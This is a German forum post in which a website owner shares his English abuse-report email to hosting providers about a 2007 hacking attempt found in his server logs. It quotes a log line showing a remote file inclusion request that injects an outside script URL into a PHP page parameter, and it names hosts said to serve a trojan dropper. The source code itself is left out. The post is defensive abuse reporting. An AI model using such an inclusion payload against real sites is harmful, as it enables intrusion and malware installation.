Powl: Hackerangriff?

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Ich habe mich zu der E-Maillösung entschieden. Vorerst. Den Text poste ich im Anschluss, wobei es mir auffällt: Schade, dass es keinen spoiler gibt.
Vielleicht kann der Text ja bei ähnlichen Vorkommnissen helfen. Nur schade, dass ich kein Französisch kann.

Bin gespannt, ob's was nutzt. Sollte sich da etwas ergeben, teile ich es hier mit. Vielleicht müsste man diese *** viel konsequenter 'abschiessen'.

Vielen Dank nochmal an alle für die Unterstützung.

netten Tag
^da Powl

Dear ladies and gentleman,

an overview of the server logfiles generated by my website led me to the following entries:

[IP von hostnoc.net] - - [11/Sep/2007:16:17:11 +0200] "GET /index.php?seite=http://rms2.ifrance.com/safe.txt?? HTTP/1.1" 404 1950 "-" "libwww-perl/5.808"

Therefore I looked up the URL http://rms2.ifrance.com/safe.txt and found a script which, by sitesteps, tries to install a trojan named Win32.Rbot.dvd.
This trojan would be installed by flash7.exe, which can be invoked by another (VB) script. In case the script might be meanwhile erased, I add the sourcecode of the scripts to this mail. (badscript.txt)
The 2nd script  is hosted at http://usuarios.arnet.com.ar/alvarezluque/morgan.html and tries to install the trojan by the latter quoted sourcecode:
(You should not visit this link without appropriate security measure!)

Although I am not well informed about the laws in USA nor France I presume hacking attempts like this are as well illegal as they are in Germany.
This made me look up the whois of hostnoc.net,  rms2.ifrance.com and arnet.com where I found your e-mail adresses.
I am writing in order to inform you about this illegal approach which is performed through your domains. I hope it will encourage you to take the necessary steps to prevent further fraudulent use of your online service. I doubt methods like this are of your interest because they might cause much as well affect your reputation.
I am looking forward for your response, weather this mail was send to the concerning recipients. If I was mistaken about the e-mail adresses, may be you can advice me whom else to apply to?
If I will not recieve an anwser in about one week, I plan to apply to the local police to file charges about this case. The necessary evidance I have saved. If you need further information about this case, I will give over everything necessary to help you stopping this fraud.

with kind regards
mein Name


Sourcecode of http://usuarios.arnet.com.ar/alvarezluque/morgan.html:
[... eben dieses ...]

Anhang Quelltext von  http://rms2.ifrance.com/safe.txt
